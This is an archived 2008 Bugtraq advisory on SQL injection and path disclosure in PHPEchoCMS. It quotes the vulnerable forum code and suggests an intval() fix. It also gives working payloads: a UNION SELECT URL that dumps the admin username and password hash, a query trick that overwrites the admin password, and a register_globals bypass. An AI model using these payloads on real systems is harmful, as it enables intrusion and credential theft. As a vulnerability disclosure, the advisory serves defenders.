lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20080117050758.31020.qmail@securityfocus.com>
Date: 17 Jan 2008 05:07:58 -0000
From: security@...or.net
To: bugtraq@...urityfocus.com
Subject: PHPEchoCMS Multible remote vulnerabilitis

Hello,,

PHPEchoCMS Multible remote vulnerabilitis

Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@...or.net


fiest thing ..
full path
kernel/init.php
modules/admin/index.php
..
every file to be included has to have the value of the variable $BASE_LOAD
but if the register globals is on then you can use in the browser like this ..
modules/files/index.php?BASE_LOAD=1

it will continue .. and other files too

modules/forum/index.php
lines [31-49]
    if (@$_POST['post']=='thread')
    {
        if (@$_POST['id'] && $_POST['title'] && $_POST['contents'])
        {
                    // Add the thread to the specified section
             $ins = "INSERT INTO `".PREFIX."threads` VALUES ('', '".addslashes($_POST['id'])."', '-1', '".addslashes($_POST['title']).
              "', '".str_replace("\n", "<br>", addslashes($_POST['contents']))."', '".$_SESSION['username']."','".date("d-m-Y H:i")."', '0')";
              $res = query($ins, 1);
              $ins = "UPDATE `".PREFIX."sections` SET `lastdate`=".date("d-m-Y H:i")." WHERE `id`=".addslashes($_POST['id']);
              $res = query($ins, 1);
              $nb = query("SELECT max(`id`) FROM `".PREFIX."threads`", 2);
              redirect ("index.php?module=forum&show=thread&id=".$nb);
         }
         else
         {
              $content = $mlang['017'];

         }
    }

see
              $ins = "UPDATE `".PREFIX."sections` SET `lastdate`=".date("d-m-Y H:i")." WHERE `id`=".addslashes($_POST['id']);

could be modified to an update query by posting value of id as next
id=union update members set password=[value] where id=1

offcourse value here should be md5 hash .. and no brackets so the query will be ok :)


lines[138-142]

    elseif (@$_GET['show']=='thread' && $_GET['id'])
    {
             // Show a thread and its replies (child-threads)

            $thread = query("SELECT * FROM `".PREFIX."threads` WHERE id=".addslashes($_GET['id']), 4);

replace with
    elseif (@$_GET['show']=='thread' && $_GET['id'])
    {
             // Show a thread and its replies (child-threads)

            $thread = query("SELECT * FROM `".PREFIX."threads` WHERE id='".intval($_GET['id'])."'", 4);


exploit
index.php?module=forum&show=thread&id=-1%20union%20select%201,2,3,username,password,username,password,8%20from%20phpecms_users%20where%20id=1/*



# WwW.SoQoR.NeT

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ